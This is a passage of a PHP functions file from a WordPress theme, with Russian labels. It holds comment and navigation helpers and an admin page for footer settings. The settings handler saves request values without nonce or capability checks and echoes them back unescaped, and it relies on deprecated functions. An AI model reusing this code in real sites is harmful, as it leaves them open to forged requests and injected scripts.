                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
